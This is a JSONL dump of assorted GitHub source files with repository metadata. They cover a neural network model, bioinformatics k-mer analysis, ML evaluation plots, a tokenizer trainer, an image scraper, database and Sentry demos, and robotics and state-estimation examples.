+{"seq_id":"74815956379","text":"import torch\r\nimport torch.nn as nn\r\nimport snntorch as snn\r\nfrom snntorch import surrogate\r\nfrom snntorch import utils\r\n\r\nclass SNN(nn.Module):\r\n def __init__(self,beta=0.9):\r\n super(SNN, self).__init__()\r\n self.beta=beta\r\n self.spike_grad=surrogate.fast_sigmoid()\r\n self.net=nn.Sequential(\r\n nn.Conv2d(1, 6, 5),\r\n nn.MaxPool2d(2),\r\n snn.Leaky(beta=self.beta, spike_grad=self.spike_grad, init_hidden=True),\r\n nn.Conv2d(6, 16, 5),\r\n nn.MaxPool2d(2),\r\n snn.Leaky(beta=self.beta, spike_grad=self.spike_grad, init_hidden=True),\r\n nn.Flatten(),\r\n nn.Linear(16*4*4, 10),\r\n snn.Leaky(beta=self.beta, spike_grad=self.spike_grad, init_hidden=True, output=True)\r\n )\r\n \r\n def forward(self, x, num_steps=100):\r\n spk_rec=[]\r\n utils.reset(self.net)\r\n for step in range(num_steps):\r\n spk_out,mem_out=self.net(x)\r\n spk_rec.append(spk_out)\r\n return torch.stack(spk_rec)\r\n\r\nclass CNN(nn.Module):\r\n def __init__(self):\r\n super(CNN, self).__init__()\r\n self.conv1 = nn.Sequential( \r\n nn.Conv2d(1, 6, 5),\r\n nn.ReLU(), \r\n nn.MaxPool2d(2), \r\n )\r\n self.conv2 = nn.Sequential( \r\n nn.Conv2d(6, 16, 5), \r\n nn.ReLU(), \r\n nn.MaxPool2d(2), \r\n )\r\n\r\n self.fc1 = nn.Sequential(\r\n nn.Linear(256, 120),\r\n nn.ReLU(),\r\n )\r\n self.fc2 = nn.Sequential(\r\n nn.Linear(120, 84),\r\n nn.ReLU(),\r\n )\r\n self.fc3 = nn.Sequential(\r\n nn.Linear(84, 10),\r\n nn.LeakyReLU(),\r\n\r\n )\r\n \r\n def forward(self, x):\r\n x1 = self.conv1(x)\r\n x2 = self.conv2(x1)\r\n x2 = x2.view(x.size(0), -1)\r\n x3 = self.fc1(x2)\r\n x4 = self.fc2(x3)\r\n x5 = self.fc3(x4)\r\n return x5\r\n\r\n\r\nif __name__ == \"__main__\":\r\n net = CNN()\r\n snn_net = SNN()\r\n a = torch.randn(5, 1, 28, 28)\r\n print(snn_net(a))\r\n print(net(a))\r\n ","repo_name":"Gennadiyev/amspp","sub_path":"tests/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"3147274819","text":"# CPPPATH defined the include path for include \"..\"\n# (open) I think include <..> uses a different path\nenv = Environment(CPPPATH='.')\n\n# dynamic library formal\nall_src_files_normal=Glob('normal/*.cpp')\nnormalSharedLib=env.SharedLibrary('normal/cppnative', all_src_files_normal)\nenv.Alias(\"install\",env.Install(\"/repo_cpp/lib\",normalSharedLib))\n\n# dynamic library stub\nall_src_files_stub=Glob('stub/*.cpp')\nstubSharedLib=env.SharedLibrary('stub/cppnative', all_src_files_stub)\nenv.Alias(\"install\",env.Install(\"/repo_cpp/stublib\",stubSharedLib))\n\n# copy the public header files\nall_public_header_files=Glob('*.h')\nenv.Alias(\"install\",env.Install(\"/repo_cpp/inc\",all_public_header_files))\n\n\n\n","repo_name":"cliveyao/sandbox","sub_path":"rpm/rpm-jni-cpp/cpp/SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"35189177612","text":"import os\nimport subprocess\n\n# Set the base directory to search\nbase_dir = \"/home/drevesz/Desktop/segmentation_may23/Images\"\n\n# Set the path to the ADSRun.py script\nads_script = \"/home/drevesz/Desktop/segmentation_may23/scripts/ADSv1.2/codes/ADSRun.py\"\n\n# Loop through all subdirectories\nfor root, dirs, files in os.walk(base_dir):\n for dir in dirs:\n # Get the full path to the subdirectory\n subdir_path = os.path.join(root, dir)\n # Construct the command to run ADSRun.py on the subdirectory\n cmd = f\"python {ads_script} -input {subdir_path}\"\n # Use subprocess to execute the command\n subprocess.run(cmd, shell=True)","repo_name":"drevesz11/HNI-automatedpipeline","sub_path":"ADSRun_loop_final.py","file_name":"ADSRun_loop_final.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"74792671260","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 14 00:18:24 2022\n\n@author: lvyang\n\"\"\"\n\nimport numpy as np\nfrom sklearn import preprocessing\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport pandas as pd\nimport tqdm\nimport os\nimport itertools\nimport work_with_files\n\n\ndef occurrences_count(string, sub):\n \"\"\"\n Counting all ocurrances of substring in string using find() method\n\n Args:\n string: str, string where to find\n sub: str, string to find\n\n Returns:\n int, number of occurrances\n \"\"\"\n # Starting index and count num\n count = start = 0\n\n # Counting\n while True:\n # If found count = count + 1\n # start = {where was found} +1\n\n start = string.find(sub, start) + 1\n if start > 0:\n count += 1\n else:\n return count\n\n\ndef making_aa_k_mers(k):\n \"\"\"\n Making all possible subsequences with length k using aminoacids (order is important)\n Args:\n k: int, length of k-mer\n\n Returns:\n list of all possible aminoacid k-mer sequences\n \"\"\"\n amino_string = 'ARNDCQEGHILKMFPSTWYV'\n\n # making all possible substrings\n subseq_iter = itertools.product(amino_string, repeat=k)\n aa_k_mer_list = list(subseq_iter)\n\n # one \"for\" to deal with tuples which we get from itertools stuff\n for i in range(len(aa_k_mer_list)):\n\n # tuples are in list\n tup = aa_k_mer_list[i]\n\n # rewriting list elements\n aa_k_mer_list[i] = ''.join(tup)\n\n return aa_k_mer_list\n\n\ndef seqio_data(seq_record):\n \"\"\"\n Working with SeqRecord class\n\n Args:\n seq_record: SeqRecord class from Biopython\n\n Returns:\n protein_name: str, name of protein\n sequence: str, sequence of protein\n \"\"\"\n\n # getting protein name\n protein = seq_record.name\n\n # getting sequence\n seq = str(seq_record.seq)\n\n return protein, seq\n\n\ndef finding_freq_single_protein(seq, aa_k_mer_list):\n \"\"\"\n Finding frequnces for subsequences in single protein\n and scaling it with SKlearn StandardScaler()\n\n Args:\n seq: str, sequence of amino acids in protein\n aa_k_mer_list: lst, all possible k-mers for aminoacids\n\n Returns:\n list, frequency of all k-mers from aa_k_mer_list, vector is normalized using sklearn\n \"\"\"\n\n # Getting initial sizes\n n = len(seq)\n\n # Initializing list where all frequencies will be saved\n vector_freq = []\n\n # Counting frequencies\n for x in aa_k_mer_list:\n vector_freq.append(float(occurrences_count(seq, x)) / n)\n\n # Making some prep with array\n vector_freq = np.array(vector_freq)\n vector_freq = vector_freq.reshape((-1, 1))\n\n # Standardizing our frequencies\n scaler = preprocessing.StandardScaler()\n vector_freq_scaled = scaler.fit_transform(vector_freq)\n \n # Getting return converting dimensions\n result = vector_freq_scaled.reshape(1, -1)[0].tolist()\n \n return result\n\ndef main_analysis(path, k_mer_num,output_file_name, trembl_usage_human=False,):\n \"\"\"\n Construct \"organism_name\".csv with k-mer analyzes. Will store analyzed file in 'data/csv_data' directory.\n !!!Warning!!! can take much time, so be prepared and sure that all parameters are good\n Args:\n path: str, path to file in fasta format with represantative proteome used in analyzes\n k_mer_num: int, k-mer length\n trembl_usage: bool, default is False. 
Do you use represantative proteome for human with TrEMBL proteins or not?\n \"\"\"\n # creating dir to store CSVs produced by function\n\n # initializing aa_subseqs\n aa_k_mer_list = making_aa_k_mers(k_mer_num)\n\n # initializing DataFrame\n table_columns = ['Organism', 'Protein'] + aa_k_mer_list\n proteins_data = pd.DataFrame(columns=table_columns)\n\n # reading\n prot_records= work_with_files.read_fasta(path)\n \n num_iter=1\n # dealing with human, because it needs to be analyzed separately\n if 1:\n\n # initializing list\n human_list = []\n\n # appending all human proteins to list and splitting it into 100 parts\n prot_records_split = np.array_split(prot_records, num_iter)\n for prot_data_part in prot_records_split:\n human_list.append(prot_data_part)\n\n # We will split analyze of human, because human proteom is too big to handle\n for j in tqdm.tqdm(range(0, num_iter)):\n\n # Creating pd.df\n proteins_data = pd.DataFrame(columns=table_columns)\n index = 0\n\n\n for i in range(len(human_list[j])):\n\n # taking exact protein and calculating metrics (frequencies)\n SeqRecord = human_list[j][i]\n prot_name, seq = seqio_data(SeqRecord)\n freq_vector = finding_freq_single_protein(seq, aa_k_mer_list)\n\n # making row for table\n adding_row = []\n adding_row.append(output_file_name)\n adding_row.append(prot_name)\n adding_row += freq_vector\n\n # adding row to the DataFrame\n proteins_data.loc[index] = adding_row\n index += 1\n\n # Writing file for every part of data, we will combine them later\n writing_path = \"data2/\"+output_file_name + f'_{ k_mer_num}_mer_' + '.csv'\n proteins_data.to_csv(writing_path)\n else:\n \n # Rewriting index\n index = 0\n\n # working with NOT human proteomes\n for i in tqdm.tqdm(range(len(prot_records))):\n\n # reading protein to calculate metrics on it\n seq_record = prot_records[i]\n prot_name, seq = seqio_data(seq_record)\n\n # calculating metrics (frequencies)\n freq_vector = finding_freq_single_protein(seq, aa_k_mer_list)\n\n # making row for pandas\n adding_row = []\n adding_row.append(output_file_name)\n adding_row.append(prot_name)\n adding_row += freq_vector\n\n # adding row to the DataFrame\n proteins_data.loc[index] = adding_row\n index += 1\n\n # Writing file\n writing_path = \"data2/\"+output_file_name + '_' + '.csv'\n proteins_data.to_csv(writing_path)\n\n\ndef main(file, k,data_type):\n main_analysis(file, k,data_type)\n \nk_mer=2\n#feature_number=20**k_mer\nfor i in[\"Train_Positive\",\"Train_Negative\",\"Test_Positive\",\"Test_negative\"]: \n main(r\"data2/%s.fasta\"%i,k_mer,i)\n","repo_name":"NWAFU-LiuLab/LYnet","sub_path":"Step2 Model_training_validation/protein-k-mer.py","file_name":"protein-k-mer.py","file_ext":"py","file_size_in_byte":6473,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"40634961609","text":"'''Escribe un programa para leer a través de un historial de correos, \nconstruye un histograma utilizando un diccionario para contar \ncuantos mensajes han llegado de cada dirección de correo electrónico, \ne imprime el diccionario'''\n\nd = dict()\n\ndef separador(a):\n b = a.split()\n return b[1]\n\ndef hola(manejador):\n\n for linea in manejador:\n if len(linea.split()) == 0 or linea.split()[0] != 'From':\n \n continue\n d[separador(linea)] = d.get(separador(linea),0)+1\n \n\n\nhola(open(\"actividad7/mbox-short.txt\"))\nprint(d)","repo_name":"idril150/mango","sub_path":"actividad8/ejercicio2.py","file_name":"ejercicio2.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"44395686396","text":"#!/usr/bin/env python3\n\n\nimport logging\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import classification_report\nfrom sklearn.calibration import CalibrationDisplay\nfrom sklearn.metrics import roc_curve, roc_auc_score, RocCurveDisplay\nfrom sklearn.metrics import precision_recall_curve, PrecisionRecallDisplay\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef getFeatureImportance(model):\n calClassifiers = model.named_steps['estimator'].calibrated_classifiers_\n importances = 0\n for classifier in calClassifiers:\n importances += classifier.base_estimator.feature_importances_\n importances /= len(calClassifiers)\n # model.named_steps['estimator'].base_estimator.feature_importances_\n importances = pd.Series(\n importances,\n model.named_steps['preprocess'].named_steps['prepare'].validCols\n ).sort_values(ascending=True)\n return importances\n\n\ndef _processTestData(model, data):\n y_test = data['y_test'].apply(\n lambda x: 1 if x == model.classes_[1] else 0)\n test_pred_proba = model.predict_proba(data['X_test'])[:,1]\n return y_test, test_pred_proba\n\n\ndef plotROC(models, data, figsize=None):\n fig, ax = plt.subplots(figsize=figsize)\n labels = []\n for name in ['logistic', 'catboost']:\n model = models[name]['model']\n y_test, test_pred_proba = _processTestData(model, data)\n AUC = roc_auc_score(y_test, test_pred_proba)\n fpr, tpr, thresholds = roc_curve(\n y_test, test_pred_proba, drop_intermediate=False)\n idx = np.nanargmin(np.abs(fpr + tpr - 1))\n RocCurveDisplay.from_estimator(\n model, data['X_test'], data['y_test'], ax=ax)\n if name == 'catboost':\n ax.axhline(tpr[idx], xmax=fpr[idx], ls='--', alpha=0.5, c='black')\n ax.axvline(fpr[idx], ymax=tpr[idx], ls='--', alpha=0.5, c='black')\n ax.scatter(fpr[idx], tpr[idx], c='black')\n label = f'{name}: AUC = {AUC:.2f}, Threshold = {thresholds[idx]:.3f}'\n labels.append(label)\n ax.axline((0, 0), slope=1, ls='--', color='red')\n ax.set_xlim([0, 1])\n ax.set_ylim([0, 1])\n ax.set_xlabel('False Positive Rate')\n ax.set_ylabel('True Positive Rate')\n ax.legend(labels=labels, loc='lower right')\n return fig, ax\n\n\ndef plotPrecisionRecall(models, data, figsize=None):\n fig, ax = plt.subplots(figsize=figsize)\n labels = []\n for name in ['logistic', 'catboost']:\n model = models[name]['model']\n y_test, test_pred_proba = _processTestData(model, data)\n precision, recall, thresholds = precision_recall_curve(\n y_test, test_pred_proba, pos_label=1)\n fscore = (2 * precision * recall) / (precision + recall)\n idx = np.nanargmax(fscore)\n PrecisionRecallDisplay.from_estimator(\n model, data['X_test'], data['y_test'], ax=ax)\n if name == 'catboost':\n ax.axhline(precision[idx], xmax=recall[idx], ls='--', alpha=0.5, c='black')\n ax.axvline(recall[idx], ymax=precision[idx], ls='--', alpha=0.5, c='black')\n ax.scatter(recall[idx], precision[idx], c='black')\n label = f'{name}: F-score = {fscore[idx]:.2f}, Threshold = {thresholds[idx]:.3f}'\n labels.append(label)\n noSkill = data['y_test'].sum() / len(data['y_test'])\n ax.axline((0, noSkill), (1, noSkill), ls='--', color='red')\n ax.set_xlim([0, 1])\n ax.set_ylim([0, 1])\n ax.set_xlabel('Recall')\n ax.set_ylabel('Precision')\n ax.legend(labels=labels, loc='upper right')\n return fig, ax\n\n\ndef plotCalibrationCurve(models, data, figsize=None, **kwargs):\n fig, ax = plt.subplots(figsize=figsize)\n names = ['logistic', 'catboost']\n for name in names:\n model = models[name]['model']\n 
CalibrationDisplay.from_estimator(\n model, data['X_test'], data['y_test'],\n ref_line=False, ax=ax, **kwargs)\n ax.axline((0, 0), slope=1, ls='--', color='red')\n ax.set_xlim(0, 1)\n ax.set_ylim(0, 1)\n ax.legend(labels=names, loc='lower right')\n return fig, ax\n\n\ndef predict(model, X):\n \"\"\" Generate predictions using trained model \"\"\"\n try:\n param = 'preprocess__prepare__decisionThreshold'\n threshold = model.get_params()[param]\n except KeyError:\n logger.error('No threshold set - setting to 0.5.')\n threshold = 0.5\n classes = model.classes_\n out = pd.DataFrame(model.predict_proba(X), columns=classes)\n out['class'] = out[classes[1]].apply(\n lambda x: classes[0] if x < threshold else classes[1])\n return out.values\n\n\ndef evaluate(model, data):\n \"\"\" Generate classification report using test data \"\"\"\n predictions = predict(model, data['X_test'])[:,2]\n report = classification_report(\n data['y_test'], predictions, output_dict=True)\n return report\n","repo_name":"nhsx/dna-risk-predict","sub_path":"src/dnattend/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"16435702663","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport os\r\n\r\n\r\ndef download_page(url):\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0\"}\r\n r=requests.get(url,headers=headers)\r\n r.encoding=r.apparent_encoding\r\n return r.text\r\n\r\ndef get_pic_list1(url,html):\r\n soup=BeautifulSoup(html,'lxml')\r\n pic_list=soup.find('div',class_='postlist')\r\n pic_list=pic_list.find_all('li')\r\n b=[]\r\n name=[]\r\n for i in pic_list:\r\n temp1=i.find('a')\r\n b.append(url+temp1.get('href'))\r\n temp2=i.find('img')\r\n name.append(temp2.get('alt'))\r\n for i in range(len(b)):\r\n get_pic_list2(b[i],name[i])\r\n\r\ndef get_pic_list2(url,name):\r\n for i in range(1,10):\r\n if i==2:\r\n url=url[:-5]+'_{}'.format(i)+'.html'\r\n elif i!=1 and i!=2:\r\n url=url[:-7]+'_{}'.format(i)+'.html'\r\n r=requests.get(url,headers={\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0\"})\r\n r.encoding=r.apparent_encoding\r\n soup=BeautifulSoup(r.text,'lxml')\r\n pic_list=soup.find('div',class_='main-image').find('img')\r\n link=pic_list.get('src')\r\n get_pic(link,name,i)\r\n\r\ndef get_pic(link,name,i):\r\n headers={\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0\"}\r\n r=requests.get(link,headers=headers)\r\n create_dir('link/{}'.format(name))\r\n with open('link/{}/{}.png'.format(name,i),'wb')as f:\r\n f.write(r.content)\r\n\r\n\r\ndef create_dir(name):\r\n if not os.path.exists(name):\r\n os.makedirs(name)\r\n\r\ndef execute(url):\r\n page_html=download_page(url)\r\n get_pic_list1(url,page_html)\r\n\r\ndef main():\r\n create_dir('pic')\r\n url='https://www.youmzi.com/'\r\n execute(url)\r\n\r\nif __name__=='__main__':\r\n main()\r\n","repo_name":"hujunhao66666/python---spider","sub_path":"2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"4853870002","text":"import argparse\nfrom glob import glob\n\nfrom tokenizers import BranchingEntropyDictionaryBuilder\nfrom tokenizers import DroprateScoreDictionaryBuilder\nfrom tokenizers import WordPieceModelBuilder\nfrom utils import check_dirs\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--corpus_directory',\n type=str,\n default='./',\n help='corpus directory'\n )\n parser.add_argument('--tokenizer_type',\n type=str,\n default='droprate',\n choices=['droprate', 'branching_entropy', 'wpm'],\n help='tokenizer type'\n )\n parser.add_argument('--tokenizer_fname',\n type=str,\n default='./noname',\n help='tokenizer_name'\n )\n parser.add_argument('--min_frequency',\n type=int, default=100,\n help='minimum frequency for universial vocabulary construction'\n )\n parser.add_argument('--subword_max_length',\n type=int,\n default=8,\n help='maximum length of left-side subsection (subword)'\n )\n parser.add_argument('--minimum_droprate_score',\n type=float,\n default=0.4,\n help='minimum #(w[:-1]) / #(w)'\n )\n parser.add_argument('--minimum_branching_entropy',\n type=float,\n default=1.5,\n help='entropy of (A? | A)'\n )\n parser.add_argument('--num_units_of_wpm',\n type=int,\n default=5000,\n help='number of Word Piece Model units'\n )\n \n args = parser.parse_args()\n \n corpus_fnames = glob('{}/*.txt'.format(args.corpus_directory)) \n tokenizer_type = args.tokenizer_type\n tokenizer_fname = args.tokenizer_fname\n min_frequency = args.min_frequency\n subword_max_length = args.subword_max_length\n minimum_droprate_score = args.minimum_droprate_score\n minimum_branching_entropy = args.minimum_branching_entropy\n num_units_of_wpm = args.num_units_of_wpm\n \n print('{} corpus exist'.format(len(corpus_fnames)))\n for corpus_fname in corpus_fnames:\n print(corpus_fname)\n \n check_dirs(tokenizer_fname)\n \n if tokenizer_type == 'droprate':\n print('Training droprate score dictionary')\n builder = DroprateScoreDictionaryBuilder(corpus_fnames,\n tokenizer_fname,\n min_frequency,\n subword_max_length,\n minimum_droprate_score\n )\n elif tokenizer_type == 'branching_entropy':\n print('Training branching_entropy dictionary')\n builder = BranchingEntropyDictionaryBuilder(corpus_fnames,\n tokenizer_fname,\n min_frequency,\n subword_max_length,\n minimum_branching_entropy\n )\n elif tokenizer_type == 'wpm':\n print('Training word piece model units')\n builder = WordPieceModelBuilder(corpus_fnames,\n subword_max_length,\n tokenizer_fname,\n num_units_of_wpm\n )\n \nif __name__ == \"__main__\":\n main()","repo_name":"lovit/archive_carblog_preliminary_analysis","sub_path":"py/utils/training_tokenizer.py","file_name":"training_tokenizer.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"14962365448","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Aug 19 01:45:32 2018\r\n\"\"\"\r\n\r\nimport sys\r\nsys.path.append('../common/')\r\nimport common\r\n\r\nimport glob\r\nimport os\r\nfrom enum import Enum\r\nimport time\r\nimport pdb\r\nimport yaml\r\nimport json\r\nimport datetime\r\n\r\ndef getSourceCode(inputFilepath):\r\n sourceCode = None\r\n with open(inputFilepath, 'r', encoding=\"utf8\") as inputFile:\r\n sourceCode = inputFile.read()\r\n return sourceCode\r\n\r\nif len(sys.argv) is 1:\r\n print (\"Error: Please specify the config file path\")\r\n sys.exit()\r\n\r\n# Get config filepath from command-line parameter\r\nconfigFilePath = sys.argv[1]\r\n# configFilePath = \"C:\\\\Users\\\\drzah\\\\Desktop\\\\newspaper\\\\newspaper-project\\\\configurations\\\\download-source-code.yaml\"\r\n\r\noutputFolderPath = None\r\noutputTypeString = None\r\ndataSources = []\r\n\r\nprint (\"Loading config file: \" + configFilePath)\r\n# Extract config data from config file\r\nif os.path.exists(configFilePath):\r\n config = yaml.load(open(configFilePath))\r\n\r\n params = [\"outputFolderPath\", \"outputType\", \"dataSources\"]\r\n # Check for elements in the config file\r\n for param in params:\r\n if param not in config:\r\n print(\"Error: \" + param + \" missing in config file\")\r\n exit\r\n\r\n outputFolderPath = config[\"outputFolderPath\"]\r\n outputTypeString = config[\"outputType\"]\r\n dataSources = config[\"dataSources\"]\r\n\r\nelse:\r\n print (\"config file does not exist\")\r\n exit\r\n\r\n# Create folder if not exists\r\nif not os.path.exists(outputFolderPath):\r\n os.makedirs(outputFolderPath)\r\n \r\n# Set output type\r\noutputType = None\r\nif outputTypeString.lower() == \"yaml\":\r\n outputType = common.OutputType.YAML\r\nelif outputTypeString.lower() == \"json\":\r\n outputType = common.OutputType.JSON\r\n \r\n# TODO: Only supporting GET requests for now\r\n# For POST requests, set config.yaml format to set get/post and post data for each url \r\nfor dataSource in dataSources:\r\n \r\n publisher = dataSource['publisher']\r\n inputFolders = dataSource['inputFolders']\r\n \r\n # Get a list of article files\r\n articleSourceFiles = []\r\n for inputFolder in inputFolders:\r\n for filename in glob.iglob(inputFolder + '/**/*.html', recursive=True):\r\n articleSourceFiles.append(filename)\r\n\r\n # For each article \r\n for articleSourceFile in articleSourceFiles:\r\n print (\"working on: \" + articleSourceFile)\r\n startTime = time.time()\r\n sourceCode = getSourceCode(articleSourceFile)\r\n \r\n # Generate filename\r\n sourceFilename = os.path.basename(articleSourceFile)\r\n # Remove extension\r\n sourceFilename = os.path.splitext(sourceFilename)[0]\r\n filename = publisher + \"+\" + sourceFilename + \".src\"\r\n \r\n outputData = {}\r\n # TODO: Can we extract the url of the article given the source code?\r\n outputData['articleUrl'] = None\r\n outputData['articleName'] = publisher + \"+\" + sourceFilename\r\n outputData['publisher'] = publisher\r\n outputData['sourceCode'] = sourceCode\r\n outputData['timeDownloaded'] = str(datetime.datetime.now())\r\n \r\n\r\n # Output To File\r\n # TODO: The following logic is common here and in common.py->Article.save(..)\r\n # TODO: Refactor this and put in a common location\r\n fileContents = None\r\n extension = None\r\n if outputType == common.OutputType.YAML:\r\n fileContents = yaml.dump(outputData, default_flow_style = False)\r\n extension = \".yaml\"\r\n elif outputType == common.OutputType.JSON:\r\n 
fileContents = json.dumps(outputData)\r\n extension = \".json\"\r\n \r\n fullPath = os.path.join(outputFolderPath, filename + extension)\r\n outputFile = open(fullPath, 'w+')\r\n outputFile.write(fileContents)\r\n outputFile.close()\r\n \r\n endTime = time.time()\r\n timeTaken = endTime - startTime\r\n print (\"file saved. Time taken: \" + str(\"%.2f\" % timeTaken))\r\n\r\n\r\n","repo_name":"AzeemGhumman/panda-dataset","sub_path":"scripts/download-source-code/download-source-code.py","file_name":"download-source-code.py","file_ext":"py","file_size_in_byte":4002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"18183223504","text":"from sentry_sdk import capture_message\n\ndef wsgi_app(environ, start_response):\n data = b\"Hello, World!\\n\"\n start_response(\"200 OK\", [\n (\"Content-Type\", \"text/plain\"),\n (\"Content-Length\", str(len(data)))\n ])\n capture_message(\"This message was sent from WSGI, via Gunicorn/Gevent\")\n return iter([data])","repo_name":"singingwolfboy/sentry-wsgi-gunicorn-gevent","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"17522048400","text":"# 오라클 패키지 필요: cx_Oracle\n# (윈도우) pip install cx_Oracle\n\nimport cx_Oracle as oci\n\n# 1) 연결 객체 얻어오기\nconn = oci.connect(\"scott/tiger@192.168.0.19:1521/orcl\")\nprint(conn)\n\n# 2) 커서 얻어오기\ncursor = conn.cursor()\n\n# 3) sql 문장 만들기\nsql = \"SELECT * FROM emp\"\n\n# 4) sql 문장 실행\ncursor.execute(sql)\n\ndatas = cursor.fetchall()\nfor row in datas:\n print(row[0], \">\", row[1])\nprint(datas)\n\n# 5) 커서 닫기\ncursor.close()\n\n# 6) 연결 닫기\nconn.close()","repo_name":"lovepizza132/python","sub_path":"cDBCon/basic/oracle_test.py","file_name":"oracle_test.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"4378541686","text":"#!/usr/bin/python\n\nimport roslib; roslib.load_manifest('path_planning_analysis')\nimport sys\nfrom path_planning_analysis import *\nimport pylab\n\nif __name__=='__main__':\n ax = pylab.axes()\n pylab.axis('equal')\n path = RobotPath(sys.argv[1]) \n vels = path.get_velocity()\n\n x =[]\n y =[]\n for t, pose in path.poses:\n x.append(pose.x)\n y.append(pose.y)\n ax.plot(path.poses[0][1].x,path.poses[0][1].y,color=\"white\")\n ax.plot(path.poses[-1][1].x*1.1,path.poses[-1][1].y*1.1,color=\"white\")\n S = 2\n\n\n for i, (t, pose) in enumerate(path.poses):\n if i % 4 != 1:\n continue\n theta = pose.theta #+ pi\n dx = cos(theta) / 500\n dy = sin(theta) / 500\n\n ax.arrow(pose.x, pose.y, dx, dy, head_width=S*.025, head_length=S*.05, fc='red') \n\n theta, amp = vels[i]\n dx = cos(theta) / 500\n dy = sin(theta) / 500\n ax.arrow(pose.x, pose.y, dx, dy, head_width=S*.005, head_length=S*.25*amp, fc='blue') \n pylab.show()\n\n","repo_name":"DLu/path_planning_metrics","sub_path":"path_planning_analysis/src/draw_with_vel_and_headings.py","file_name":"draw_with_vel_and_headings.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"9454125152","text":"\"\"\"\nThis is an example script showing how to run a batch estimator on custom \nprocess and measurement models.\n\"\"\"\n\nfrom navlie.lib import BodyFrameVelocity, RangePoseToAnchor, SE3State\nimport navlie as nav\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef main():\n # ##########################################################################\n # Create the batch estimator with desired settings\n estimator = nav.BatchEstimator(solver_type=\"GN\", max_iters=20)\n\n # ##########################################################################\n # Problem Setup\n t_end = 4\n x0 = SE3State([0, 0, 0, 0, 0, 0], stamp=0.0)\n P0 = 0.1**2 * np.identity(6)\n R = 0.1**2\n Q = np.diag([0.01**2, 0.01**2, 0.01**2, 0.1, 0.1, 0.1])\n range_models = [\n RangePoseToAnchor([1, 0, 0], [0.17, 0.17, 0], R),\n RangePoseToAnchor([1, 0, 0], [-0.17, 0.17, 0], R),\n RangePoseToAnchor([-1, 0, 0], [0.17, 0.17, 0], R),\n RangePoseToAnchor([-1, 0, 0], [-0.17, 0.17, 0], R),\n RangePoseToAnchor([0, 2, 0], [0.17, 0.17, 0], R),\n RangePoseToAnchor([0, 2, 0], [-0.17, 0.17, 0], R),\n RangePoseToAnchor([0, 2, 2], [0.17, 0.17, 0], R),\n RangePoseToAnchor([0, 2, 2], [-0.17, 0.17, 0], R),\n ]\n\n range_freqs = 20\n process_model = BodyFrameVelocity(Q)\n input_profile = lambda t, x: np.array(\n [np.sin(0.1 * t), np.cos(0.1 * t), np.sin(0.1 * t), 1, 0, 0]\n )\n\n input_freq = 100\n noise_active = True\n\n # Generate data with no noise\n dg = nav.DataGenerator(\n process_model,\n input_profile,\n Q,\n input_freq,\n range_models,\n range_freqs,\n )\n\n state_true, input_list, meas_list = dg.generate(x0, 0, t_end, noise_active)\n\n # Run batch\n estimate_list, opt_results = estimator.solve(\n x0,\n P0,\n input_list,\n meas_list,\n process_model,\n return_opt_results=True,\n )\n\n print(opt_results[\"summary\"])\n\n results = nav.GaussianResultList.from_estimates(estimate_list, state_true)\n return results\n\n\nif __name__ == \"__main__\":\n results = main()\n fig, ax = nav.plot_error(results)\n ax[-1][0].set_xlabel(\"Time (s)\")\n ax[-1][1].set_xlabel(\"Time (s)\")\n ax[0][0].set_title(\"Orientation Error\")\n ax[0][1].set_title(\"Position Error\")\n plt.show()\n","repo_name":"decargroup/navlie","sub_path":"examples/ex_batch_se3.py","file_name":"ex_batch_se3.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","stars":116,"dataset":"github-code","pt":"69"}
